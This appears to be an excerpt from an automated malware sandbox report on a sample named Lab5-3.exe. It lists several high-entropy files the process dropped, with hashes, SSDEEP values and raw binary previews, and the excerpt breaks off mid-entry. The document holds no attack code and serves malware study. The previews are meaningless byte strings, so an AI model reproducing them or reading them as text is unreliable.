                                                                                                          Preview:(T...u.~......+.I...Kh..T...l/oX....\7..Y.=.g.....2q..b"...X.NLF.(f..W1.j.C]L.a..$W...7.WDq$.Wr...X..o......r...ms...%..c..#'5.q....R....A/.x..hZ...x...5......^...)qF......6. '..[...d)ap...1.^..vz......y.3j.v.....".7..@n:..).-3...O.....j....T.....vM..._)........*..F..D.....xsG...6.f...H.....PX.9.".M.Q....P=.l.7.X~....G.o*U...~.....y.W.#qm..R]I(..*.l.ez....#.WC|.....".x..).v.{zPp.8...pq....,T..[..'.Mp...X#.7.v]5.......9......Q.."._6....r=...y..Z......cB*.A;..s>t..c.`.J..l.l.. ...@.sY.....s:.P...e.L..N..T...9.......Ks..^|V.V.HB...#..81Mk....w...l.y#.I.(..&..h.S1.,.%...7X.,*..f...p".............*.Z..i.x.H./r.........chE{....5H.RY..,.x.#VaG.[O+...YB.HZ$I..p.f....u....Ot\.4=m8L .}...K..12:....+.Q..{....c....z....l...E...}Z.d..f.....smQ.Z'W9.;.QY.A....|.A.....l..,..<.%...{..k..%^a..S.5..8..Rm".J1......-.k..9[....O.....d....X...~K..gjf..A..^c~..=.0V...srf..Lhu...*%...t.2.B|.T.;....Ci.L.Xe...!....9..s...)....).|.;[.QLM8.j...sjCw..:.c..x,#}J.?'...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.9211236273686
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GoVs46s1jj10kPKiBOrBxc8lXNNHK2nF8sHfUTid3hBaUoSGFcmeykEdEElU92i:Gcs4/dxBIhPHK2GrGx0uKeY2ElUJ
                                                                                                          MD5:C9B6D436E21758BDD6106CB680389303
                                                                                                          SHA1:8B053502A591642F71BDF4B234909A1E8E28FCFB
                                                                                                          SHA-256:1C534DD5C94D8BDE255B40B65329E2D63285CB49AE55A04D923D1223717718FF
                                                                                                          SHA-512:77B5E03DD26148AA1AC97210BA9717F8D23D8D92C230650FECC329810D65F672CE352EE06FE8D1D46240896F89BC59AE8391B81AF7B776D47AA4A33178C09E99
                                                                                                          Malicious:false
                                                                                                          Preview:..P.*{..PM....bCX.1.T.`F.k.6......"|..t...Z..I.3.Plt....SI......T...K.~.f.....s..u$.Rs.A..hY.."....q..(.....^.<..($BE.;.;2NHcMEp..v...R.yW.!...\...^......5U].'.=P`p9kp....`Vm..%..L..<.A:..D..[....j.....+.n.......m..pEm.:...w........c.j.k........a..h.&b\gd..*V..&k..j.9V..P...C..n...(.........[x]..l..<%>..{...p..>Hd'...(.Z.d..j......Wd.B....7.)'.O..$AY....G>./.9..k.....=.@.8..fd.Vf..Q5m.)=....m.....o...../..#..g7....s.=..2.....h.<L.p.Q.[.nf.i&....n.G....y.....hm..A..=9..!..3-...Sz$...P.Vy]k...z.u...9T/c.+M7D..(%.@.k#...=B...d....i.....37...+ $x.&...#...3........+wp.J7xq..gnm........~.6?..|j..#....S.Y.av..C.T..[f$....t.....I..S.T...d.k.6..G...E.....1...P%Z^S."....-(g..".>.=...n'..w=96m.^.x.......>.... N?.m....).R3.....a.B.pVFO(...d.P.;......=..c..2T...E$Z...`..............SQ.K....aA.gLpA.(.v..t..0U...G......y.mBD..`..6..K..C~.U..d.T...Z...asi.....:`....;W...I.3.EM.]$%iLR{..3].U)U5t'.n...G.....F...p.q..M./$0.2.4..e.*.@q]o...g..g...j8tN.B.2.PT....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3120
                                                                                                          Entropy (8bit):7.934670654308
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:L2gpZFhE9HDu7zjJjrEji6Zjs58ACTN3z89aYOHfUTid3hBaUoSGFcmeykEdEElk:qgMV6jexe58ACB89aYhGx0uKeY2ElUJ
                                                                                                          MD5:717316FC38F80DC151EBB8075925A0C1
                                                                                                          SHA1:2F30301D7AC21BEECD66D241385B27D26B090F4A
                                                                                                          SHA-256:A8DD3C69FC6F6B612D428A15DC015E62FEF4C8A654B2C90B0F5EE6B9C2CFC5E4
                                                                                                          SHA-512:BF295A87E1F35FD2B528F83135586B519CB7057947DD6D86B6C95CF4E8BA48152D6BEE8D05BD997F14950DC992E31C24079BFF091684E3C46030EE3F4E79B8AF
                                                                                                          Malicious:false
                                                                                                          Preview:rR...R..A..b..6sP.......y..2.sC..+....m.k.p....:w...E....0cGK....~...).';.........VS....c...n..$...... .....Md.R.C9.h..?.c..r.K...e..J...W....j.m.a~...Yo..`\.b.U.w4..1....E$p..'..R.r.n....%>...C..N.)....@......XNP.i......'.K9W8.'[..G.0..};..5w..|...P.....h...WR"#......x...x.$..'.....-?9....Cn..(dV..."Pev.#..+. ...W.....p..p,.d2...J..q.).4..D|$.gM..W..D....KX~;.6LR..|....,.@...O....d..|.^.Z...5...A....QX..|......Y*.Z.....9.$+..K".:pQ..h.L....H...~Y56.o.l.g.")?/..K...%..........|..Z!.U.@..y.8.@.i...|........tm...Hpdh.7EW..C..oI..3...NY....V.~I...IV.Q...-.N..z.C.z.....Q..|z1..*...\.Biex.....].......<...&.~...eWn.<d.....R{...w...i.....gs-.<......KPt..pr..CL........v..P..`.k..2..?.6....5SY..%....T.#:.o...d.O..j.|.(Wp....$...b./..#t.....w.e=`.....xan.8:=h[8=8.L...C/R$>p.....k`..;{O.W......e.."Iw.!WB..a..V~(:u...~OH.x....5...M...{.......h..n]].m........v$.`l.N.W'..D.5..Om...I*..C.._.Y..^...}D.;0.Yv=.j....s.iG.<...ry...8`.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.964520777909673
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:I5IVV5UTeI+83PgfdDms4qFZGchAoJoZVbGx0uKeY2ElUJ:iA5oeIL3qg4zLhrJoZK0Cb
                                                                                                          MD5:BB0D089A32F77ACA8A311D595DAFC099
                                                                                                          SHA1:150B634A7FAD675604FC5E09BEEFF39576CA9421
                                                                                                          SHA-256:9A57D4F6F37FC59BB399045E83A978AF27DD1B3B722A48F0D38B7A2412083D37
                                                                                                          SHA-512:FC43DF3C2FCF14A42742F36AD33E988573E1D571DA2FA4911CBD40CEF095CB49B5B12E627DAC722ECCD6739E1255191C8E86F78A93B7EC41EAD033E13C9488C9
                                                                                                          Malicious:false
                                                                                                          Preview:.T.^.._O@.R.5.....2D]5#..!..bx.[..m..?...?...@...W.+.>....(X..U..W.My....@..nY...\Z.O.?[...{<4b*%..D.3...........I.....).| ?.1B.j.i.0....8O..2g.M........x.....qn........h....g,Y=D . t.(q../.H,.5.Z#.....&jZ....!?...K....:i>..%=.]iA;....K..@db............s.=M.`NO4wbKM.4.....t|-....Fk<....";.xY.lC...p..;>.^.L.#.G..X.....sKJ.,.B.#....Xc.T.......;~..O.....x.N9..b4......$.#.B........G.b....^.-a..w....u.....r....1.yQBr.)....<...R..jn.O.n..W*.+.*h.b..s..E0.x=.u..l......U..<..kh.y.......y..V]..%NA-.IC...m_...F.JV`...{.B...D... z.rm.@q..:3....B=......$....5..;.b!.."..U...<..........=.h.3...~....aj..*bA..\.o(...<.R.j.^.F.\.U..g.A;.+M.4.)...;.W.... ....8.PE..t.dq......2xT..}(.h.!.8.9..%j.#m..0.....\V.).......tS(......%K.........p.[N....|....R.;.....'...U.+...:../..K.2/P?%@.T......k.G.s.&/,1r..D.........Ir..'.....t.......$.&E..m.b....,....Dw.....{'_..`...Y.....1....Z...?....F!3...B.DKh....I>...Zt.=.....S.<dr..w5..hG.|XZ..6...`....#a.f."R..\yI. r..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.938619671174299
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:sLhNdpxI6PTAzOA/b0Z53bEmzb5mHfUTid3hBaUoSGFcmeykEdEElU92i:MhNdF4OfEEbTGx0uKeY2ElUJ
                                                                                                          MD5:2EC4FEB4C380D45FC62F0656113FFFE7
                                                                                                          SHA1:5E29525E955F72DD709545E17DB70AE7DD3D094B
                                                                                                          SHA-256:AFDDFE028ACFD5FF62ACF3E7BEB7A671DF2A7F112C11282C9DFB85A742C6A030
                                                                                                          SHA-512:89D27BE527DFEC19850846ACADADEFAC4EDC16F497100312AB0C50276A9F50DD1E6B5707A73D5EFBDA7284FC28C980958B389B33AA40AD0B0D520AE371C13F31
                                                                                                          Malicious:false
                                                                                                          Preview:i#Za^8..Z./....J.......0.B..Y....=6vB....7.s..'...._6.__.G.v...~X...T.^&.r..5.M.T..Z...T7.>y./.\....'ea}`.o..]......p..c}.&..)f..b&m...=.....)c...r-.0i....p>:..m..LT.7fk...b..8D..e8M..r7..;...&..S.=.x[1..Ud..w..P,[..T..........p.sI.n.....aX"j..2j..%......5`.4../O.0.Zh/,`+...p..n....r...]..JRH...Um..!.......x..x.BB....Gs...m.$c...{2.R.....V.....<..m[.........w.&...w..w~.F.....}........vc.L(........F*@.Ss.w..8.f...:T..r.'..=..z....?...7P.`...Tp.<..k...PZT.O.>M.\.:@.r.<.=....>.Q..p..L..j9.l7.jH..)1Y6...t..X..x.....eKx.p.J.C..u|.zM. r....e#.zeX.Y..rH;"].W`.0!...?.Y..Y..b.HuT.....?..k.......H.2.2c....o..>.....$.*$.....\.....Q.]M........m...yQ.7..w......c.......A...p\.......^..d......(<.*wO#ZY_.....u.%F...Q.\...o..V.....gQ..J...&+.........-.B.!..Q2..&.u.~p....lE..V.9.zp...).d.k.=*hW#o..........l.C(E).H.}....5/..O....@.mz......'3q.......J..W.@$!!..4...-.....[A.......^.Lx..Z..V..../F1.+l8..:]`.d..@{..->U.....T#."L.8......wQ.?.[.b.VU.~S<..p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:COM executable for DOS
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3904
                                                                                                          Entropy (8bit):7.95358932081187
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:C2x6LP2I8C0fLX8q3eWOAwjDK9mf5jOiNCGx0uKeY2ElUJ:CBLPptuX4fomf5Cuh0Cb
                                                                                                          MD5:EAEF62DAA698F07A60EB46C8BFF02A47
                                                                                                          SHA1:029A8CA8778818C11E401DFD3916568603FF1AE2
                                                                                                          SHA-256:EC4D9CC8726017F037D6BF326E0C908E5517B5BD6D9ACABF7562AC4542C34EE7
                                                                                                          SHA-512:DCF442118ED6AB697ED5CE2E6E0AB481ECF74AC1A9151857277AD555B0F526FA37D93C256786E9B50A1160AA0E02C31802B833AA3C6751DD1006D9B9A6962D61
                                                                                                          Malicious:false
                                                                                                          Preview:..k|}.}.B.2n.NB.o.~.y.2.T...M.....F...Q.....2.Q..2..N...$.Z.ML......E....g9r.0.t.%Q=7..[7*..G;...i...j.o.........;.G.....8...o".m...^..|J..k6m.O*r."..#.1.7.:K2...n..0......0...m.K.........%r.J.L%.>..Z../..0D.%..kc..XA.+...M.,W..x^ox..j.8}..=M7..s9..}..7.5.y......]..f.j.Sc..K-...).?+.QY...7E.Q.._C&.d@...F...n...:s.Vl.e..u.~.| aD .....e.8.H....b;..q...c....;...=....]....j..k..#:.E...9:.....!.. 8..sP(>!.5.M.Yr]'.,.]..}.....y|.}..F.x.[..7...WV.."....`.\.$>..'..K......";.Q..l_..... .....?F.......']AH...Z...H.j.{.a..+....^.s6.......%..}k...{3.q.l:...S;.......$.....UD.....Z.....<:.n......b`.....]$.;I.....'.}L...r..f..... =..@..k..X......:.gq.0.\.]J7+..>#Y....v.....F..O.......$PB..M*.....,.,.k..f.....G.}\h.,..).....3..rA..T.f.R&B9....ii.v.f...|[^VQ.ON..#1&.Z;..y.....U.8..H......S..i.AX.ri.[."..$...NT..g5.\p3.~..7.....1..nZ....kF../>v[.....k. .<A..3....t.&n:.<......D.Gb.r'I..2..D}............K..wf.2.DC...s.?M...W..m}..^..`..8.'a".hk.4...Q...v.(.o.....S..n..o.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.932233053979458
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bEQTzffb1RnpsBuzbg4rxefBJRrNSsD3HfUTid3hBaUoSGFcmeykEdEElU92i:IQTzffjaEz79epJ5MAcGx0uKeY2ElUJ
                                                                                                          MD5:9219305A075870A26B8D5104F729064A
                                                                                                          SHA1:CE1D1F4FD98C9207E8A9DA626BA46DFDEADB127B
                                                                                                          SHA-256:FD2044FEEEC76D5D6224FD8E6DC9A41C6341046776C554B07A2753427439C2BA
                                                                                                          SHA-512:9CD4A206718C2265CA5C8B85E82278A7EFF2134376FE924A4A3BF24591D9621EF9E2A46DDB84A771DEF879B12B45D47E4D5155C8DAAC048129DCA0B1D1D7E6FE
                                                                                                          Malicious:false
                                                                                                          Preview:B..m..6 H.{.R..A.F...=.~.G..:..Wk.W.hg}...........}.0..........J:L.k..U-Nz$..`N........7.....B.$....7......hg>gpr.Ib._L.[..<....^.d..J9....w.rEOn...$....!.._(.Q..#.XF7......i.%i..........f.y...U.+..h.A........v.Z........&.7.0.z.....=!......"A..gh..X......W..}...w...}..g+.......sq..:F=.lJ....N.D.I.<.1.@.!......S.......t......A2......[.YtK.....7/;..ch...,.....oWkK..`.b....5....d...0.@U..bY^..*..$.t...m(....`q....i.....7JKHz{.4x...k.:..o.....H...x.. ...u+j.".h.>.X....Wn.e......@..t...{...^.$...S.i+)..")..'.....iW..+/..0Z..%6._=....K...P.-P...V.....H.r.z....;........"..C..-|&.:.s..-%5A....!\..1...zM......!...W[.l.'n.@..6....5{.(..x...v.....k.A..].,Q0....G._..K...2s.S/.....{..#...?.7AM3..X.i.C3........-..........YkS.e....O8N.7h....DL....e....1Q...0.......e......bq/M....g..\;...[q_5R.p...n.....5dT.nD.0..-......._..P.B..k.j.D.$..A......+OS....H.R.8.K.PP.|;k.m.26.Ql.p./.n)..4.....r.4...UJ..U......4G/G....z./>......)+.rF..n....b....$...5..?P..T.........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13584
                                                                                                          Entropy (8bit):7.987207667192162
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:2oFXwawW3WHAgNOXB/9kcOoQXMJAl+du3ts6MD9REPHi6t/360Cb:2oFXwY3WHxKReXMmcduO/D7EPi6t/qtb
                                                                                                          MD5:ABB58C0DCB04C5573F11E7DA30AE78A2
                                                                                                          SHA1:A66F595995A082120480BF43553EE264E52115B9
                                                                                                          SHA-256:B4D73734159AF1E3F007EE1EF47E1300AAE4332BD02FCB0A3CA2E7F65516AD1D
                                                                                                          SHA-512:957AA7DC88B716299C77F8EAADECFE148E02D4A5BB4073ED6CC2F2B1A20498582018BAA8EF9B1B6F20D7BAC5760614A13913E306279C262B95B636EF505DC47D
                                                                                                          Malicious:false
                                                                                                          Preview:..j../...k.O..~..e|.u-Rs....j....U.A.8U...ly...1...p...(...._3.Q.t...R...<<.(..=.".P..f..@I.s...j.#'...+6..bDov.....j...e,....q.<...Xr...x.Z..N?....X...........lS;.....Y.$%....R...L.x..x...p...ivd..Z..>..}.GD......R.......6...=i... 3...4.....ol.P.L.@}...M.zr.._...fm.\H..n..D*.k..F$|....+.5....;....m......_{.^..#...F8t......%....[.A...h.g...3v.".@.a12q...m..;.I..". .#.z.F.$......?-.Oj.H...+...rlt%....t..d.2B..Y...)\.-.....6.tm.y.;&...ko...NV..!|.....@.w..POK.z.M..F.i.T'....vl..tl..Qu....:...:.K......Y..J..^..6...5...@....;dCjT..~....1.....E.......D[.n...a}.0..).w1b...}[.gXjTr'.D...$.9..P....TF...Yz+"..S...k.9E.V:...}c...V.Ue.1.n!.|`-.y.V.6..."...lij.s)8......H.}st....._6..P8.@.Z*.L'{.^...q.....|5.\..SJ.om...J.Mj>Y.@.....=..Y..A.(.=.....l.tXc...........x;%..GO..B..c.D.w.:.L...r..D.*<gc.....Y.&."..x. .oN(J..&T.;....S.bG..9.>#sE..._i.....v.5B..k....H.9.R.N*m..D..n(.K...=.....Oq.....I&....Mh..A.......e`&....4...b...~..z.B.["..M.." .....%..*...i.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14320
                                                                                                          Entropy (8bit):7.986606112922542
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:FFyb/twk/aTikNO/R2jnlwVCdm9KDgUyChhtb:FFyOSegyECQUMirZ
                                                                                                          MD5:A8D4AD4AEC2B948CD7E6FC64A515B45D
                                                                                                          SHA1:7E2BEFF812B4287CAC658D3E3497EF17DBF3476A
                                                                                                          SHA-256:D4C2FECDE550234EC7A50CE9B88F5E8B511EE41C21434BDCC2AB792B9620F6ED
                                                                                                          SHA-512:543743A0F60997AC26E2D7D16FCEA0A7FB2D56D453F003D18E1EFEB97C89B5E3871EE95611FB27331E0394662AAA117763A88238DB5F0B55A4885B67914B2B47
                                                                                                          Malicious:false
                                                                                                          Preview:........~Ta...$L.....O.....1...N.ea.a.!.*Q...X.L.q.l......J<..D1d...YY...m5i..i.s..T..Y..GO.9.9.rp.....R..b.n}q..4.......6..5........e.%p..f{s....hd.qX..-.;.....7..!..]...1...J.e...]?.(.?.X*..+F......`@..d.);2..]^9..U.Vm.G|.G..3..\d>Z.....N..........&e......y.T....V./..x.^0E...u.-POS.5.o.....).V..........o.8.H.C~>1O....Sw.X.Y..+....#.....Y.......2N.`5......v/F^A..mf......(.y.....aA.."E.....l..y.:;..$....8...ae...$...feg...Z...S..(.6k....96.m....)...x...3..Di..g.:...."MXD..K._.....T..de..@.-..........m....)...z......w...>.a.J...3...E@.........D..?.<.%F...*_,.`......k]0.;.c..gE.."d..q.O....*e.Z.<..Hb0..Z.G..o.n....$j........Q9..(..N.,z.9..0..3....x..Dh{l.dr#+1.0.Bs..q.6..=(m.G..F.5..N....=O.2.......0....o..nR..{...R.&RY.w.fV0.l.a...I.u?....f..g{=.........=.vx...).B=.(;%. ..l>8(!..*.J........m..p...Y....G+E.U..^!.q.$.V..9I]..&T.....ux.,.j..&7..2U......2R.Z..j..._...W.0F.U;z.=[......*u.k.~.2$..^E.1S......jC..Q.......K..bNfJ..p./RK...A..).=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.91930084134239
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EZdH5f7Yy6bGcn72M//QbO7b2HfUTid3hBaUoSGFcmeykEdEElU92i:edpn6b92MnQbSGx0uKeY2ElUJ
                                                                                                          MD5:22E9B66B9918E0CC5966D9DF3CBEDF63
                                                                                                          SHA1:FDA6F583FDF6934DE7CFBE6363AF36E5DF3C5932
                                                                                                          SHA-256:70DB73A767A3C4D0D803BB0E45CAEE01A6291E9AE924599C5ECEA70B12AE5C5C
                                                                                                          SHA-512:14D1EB4FB67C54BED9F8EC40A766CE1F60B1568A9F5B765082753BC9A3878CCD24FDF1F4005E379179C27369148584107A347F5F47D1CD65A941A9121006A1A7
                                                                                                          Malicious:false
                                                                                                          Preview:r...IGC..d....(.@.5.4.b..*U.0.....6.&D....:..).O.IW>$....o.TF....RYR.K...(...^kM.8..] n.q.......&..3..H..A..t...Qk.....5.....Bac.d:."nZ.(.5k..:..k. .o/..-.=.#...............%.j.sS..W{.c...^$...Y....694.c..Kk.$.....M.Zr.D%..;.=r..L.....W..RF+z.@.....z.......-..DC;X...3.ZGJ5.B.*.ze..]..-......x.......e.K%..[Z...W.j.Lp8.E"z.4...o..&.._.5..<.O+....`.........t.I]&.-.%..l... .}!Y.....{..Z...E.p....*..J..N.]&.i...*..]oh.|.n+.Ui.Am..=.*...{.x4t.N...k.vR9d.@.dx.........A;.}|./:.-.@.....\..1...!..8Z..6/%.M..2..q9(..S...kh.k....:*..S....><F...r......Jo..4I./i.;..N...S?~r^NjEE......x.$x.....{.....VM24...d..e.nb1.O..%...d..U.;0..=......&.S...8};...3..Rw...!.%.5.&.UBq.......g2..0..Q".Zl}[[.n...p..K....k.t..qT.Kb..kd.9r..U..D.@...k....Ps......_[.{.....r.*.p...........F..;..#:-....i..a........Wf..,.e?.?..n4.'...:......m...]..H....SDv../..C>.7....V...n.<.9..J[.O.-....;Ke%L....V..F.%...t2.8..L.=...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.9204977070783436
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LRtfCpJO0AYASA9rwfD10dN6/xWyHfUTid3hBaUoSGFcmeykEdEElU92i:L+pJrPrAVwfD10dNUWtGx0uKeY2ElUJ
                                                                                                          MD5:20177450EA0A0554CA064392E88E65D4
                                                                                                          SHA1:41B28CE8FF5FC16640F5096DCB8496C20E5DE237
                                                                                                          SHA-256:F2714B492F198BBFE001B331997BB2FB2F95EBD5E2D9EBE5CF8790126253A004
                                                                                                          SHA-512:D85AEADEE34495EF3ABF2B8D30D06673BB92B0A16858D315776F8646039613A5126CC7EDE951F716F6192F8BBA4509218D00975DED06BD8D1750A0C1488514E9
                                                                                                          Malicious:false
                                                                                                          Preview:/%.z+.R..3wj....&zn..#.K.%m!Rju.c.,...hd..Y..p...\+.h......'..2...)..X5i..)I.6"LG..L.w..^.Y.y.....rg..f1.o.j.6..|...I.b.Us.0....L....Zu..+.=.x6>\=...H...2S.D....g..bq....J.....=...rx..d.....I..\I.)hmk.l.......s`.l..)~u%xA..4..B.RRL..&...(.H._...{.CE.qk.):A...%..A..*..l..q.....v..koK1U4w'...IX.:.?P..,.,7...!i..1V$a>J.l.3.2..U.6%Rc.IdXr&.....^.5.........$.`..=6A.SD......>M.....Y...i.C.t...:.D...X.Wn...%...I..$.V....Cx.c~.....&_..6..J{..l..q^.)TTuu?...!..N...n..K.y...Y.....)q.Z.d..\.mA......j...[x.f.sTo|.2.2.).Q$B.9O6..U^........./.t..4f..<.>..P'.B....d.....:...../,..,.H6.....}L..P..5.."O..{.>sy.re]..(...]..2.as.RO.3.[..:..3v5R.y.y.u...1...:.....c..)...n q:4.+....f........_....*..[..jc8..o...3/......-w<;........a......:..[)......F.b[j]..t..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.943502960979733
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:46O7Lv/K4LRbs2bMxABRXWvRraiQ+Gmbi3zlyHfUTid3hBaUoSGFcmeykEdEElUJ:4BXPpsyiAuhaikmbYnGx0uKeY2ElUJ
                                                                                                          MD5:2B393E325549A151865B632FEE6A4A48
                                                                                                          SHA1:6D99EB9823740D65403B1B108329E661B7D55765
                                                                                                          SHA-256:824C04B5510C7D22BDB7A0683FBBD5FA9BF615161828A9E5D067DD6401403C81
                                                                                                          SHA-512:CC3605456CCEC34BA8F2A14E0EFB058E79EF3F964CBCB4303F79D89D5F26F01F645A8A4268BDC2017CD2503164719FE76AEFE6F57B637B02E517AB5CC844BC5D
                                                                                                          Malicious:false
                                                                                                          Preview:4b*aA.X.N..!..\N"..\.]..'...K@.^.fXE..M.U..]..v.../..w....F..,..b..h..u.K.0..m...@.[.0S..WK..3..5...)......RY. LU....T..A}Q...i...n...j.<..v.j-..z\.......J.k,.#.......tC......|..i.yV.q..y..&<.m.l.%....V.]..(.*%..n....e.H..N_.3..al.y..'.....Re.j.K.C.l:..}L=S..An.$.VN...$.A..g..z.bq..jd.=..@.h.vT.....Xv.+........a..#...././R^7b..'...L@....{..P..H..T........X..........n(..ho!n..).rEz.....w../...|,v.......D..-F.%]<-.L.b{8NOY;.. ....p.\....-.o.8......<.i...`..B.;S.RQ....bS......"V4..9...&..2J..A...._bLE.s.........m.....rj=.f..F.@.`=1..i...p!.<7..D..}...|s=.v..~7"..Gm..9t.w..zD..G.[..5O..D.Q..K.d.....`.S{h.3..3..]../.+.(...t.0&..NG.Y......:..][....=....(....gR.9L.3.....j.f...+?....3W.s..?a.o.'.....F...I..S..;.f.......`.w....`3.s.....e.'h..k._d(...q.........jpq..^.T6....[....1#..x}..D.I...p..).,Q.a..p~U....>.....w..%F.-+\6..V.*4..k.,M|d%.."!.Z...........uXS`.R.|.F.........O>F..x.....g.56../.{....t.Q....H0v'2i......G...w...gt...y3..[!.n...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.912436622907771
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3pphEoOVTFheHfUTid3hBaUoSGFcmeykEdEElU92i:3mHGx0uKeY2ElUJ
                                                                                                          MD5:604FDED9F96F7623F367D871B50BFA61
                                                                                                          SHA1:4A17BA852D049822CC5F326A2E4F545E75139CAF
                                                                                                          SHA-256:7675D5A3ADDF9268028B4396EA62A7FF9B4ADA01FE50353EBD39D32EBD6968B4
                                                                                                          SHA-512:E2F3472B2FAFE55109B5C14C42BD66693CEA6637DB8EDDAAFB193A42E432F4DEF9A3C9F34EE03F590FF4A308F9DD18BAE4552A5DA6E76BBD37B0A3DA71E332AF
                                                                                                          Malicious:false
                                                                                                          Preview:A.L.XU2. . .....{}9.c.O.._7.O.x.....#NDe..^:rX..j.....&a@....0#>PU..,}.H..so.1.@Z.B|......N..........y.....Q....r..Z.k@1....RP.].....TT..Z%.G..&.v.....s....W. .o.]9iD.''...Zw..Nr.Z.....=E.\..F.H..f./.Yp..ex.V.......L5.O<.{+.+.E.y......k...9.....T..dpG....?T.8G.g5..P>.'t.c...L.3.*aB.Qi...{..g....{.....1.......'"o...&.)..z"..b^.........+...U.M5.gcpPAo....~S...L..vBqah..Z{..q.z...h!.V.Eir..+...".G...._D..#.G!...y..}f...3J`e)..d.+...{.f4..I_.W..k.O.o...........s....0E...$..........?..]).#p.D............1o.$...$.j.j..?$gT.G....>...*."../O..c...{7..Cb..^..Z^...l.I.a.A2lqZ&.e.*.k....B.\p.K...j.!..@.s..%......B#....3<....0..u}.....+...gl.o...k..'.d.....Jv.l#[^)..R..u....v%f.V..P....Dw\L...q..DE)..B.a....$`..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.93274228021573
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xaVvT78NWPXkhFT8d7HJsg20g1LTdgwuvMHfUTid3hBaUoSGFcmeykEdEElU92i:SvTS20TT8dN/hbwujGx0uKeY2ElUJ
                                                                                                          MD5:422C6364E4FEF613ECCA444EA83F2C12
                                                                                                          SHA1:5CD5DC41BEAAD9E9056496B59B128C3754227C0B
                                                                                                          SHA-256:E1608F4E0D3B27766B9935DB9077962D837351707CDDBCC37E05F3CA15F775B3
                                                                                                          SHA-512:89D87DD801238AA2FAA74A12171CED2630BBD63A9828200C338B5D6AF63124388CF9862C4777923855ED98488ED6C74AD81B9E677D1DD12FCE03B509FD48B20C
                                                                                                          Malicious:false
                                                                                                          Preview:$.j:..F.>.5.&`.X..g.?A.......p.Uk?........7dt..p..L.h..S..r.i."=\j..P3.vl..t.y.]..<."..!...gz|..k!F...s.I.G.p.a...*j../.s?.=b...)..jJ.=C.L. ............x....P>Hz..t..x.{...X...'.U..W...`......r......[.&t.8g..V.2..&.....P.......`.........RP...]`....vk..ESy.\..q..Z.D*...{fpv`)J....m..}A...........n.......b.....[.)....i......w.........._Zf./....0SLE.B.lI...!..c....=......?......bn3...}...\.....U...$.M...|.6....3.h.<..\.C...0M.wp)..^..~=.V,_J$..0..,F!.....gl.....w..VB....q".....u......[..R.L. wG)X..T.N9.f..'......E.'.....t..[O.d... ..-.Q..6V7e.1.L....H."`......N.V>iG.Ia........p.0M.XjeC..B(.<;..Th....z..J.YK...G/....l....#...1f..M`r........H-..}.1..|....D.. Tbp..@pZ.Qb#g..X.. _.^..ue...+.=.iZ;....=..Kx....@?..~.....0.....Z..z...V.3.....9.....6..W......=8,.u.._[..&.H!..0-h...d.....Z.....L...3T.y....g.5./...j.i.@.u...;..,u.+.S(.pDL=...BIA...&x0.#.c....!.gX.HDZ.=c+G..k..r.$.o..hu.?...].^...-lx.8...u.s!..^$.=..Q>.A*.#k?.(1....;.Y7.......Z7..I%L.tz...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
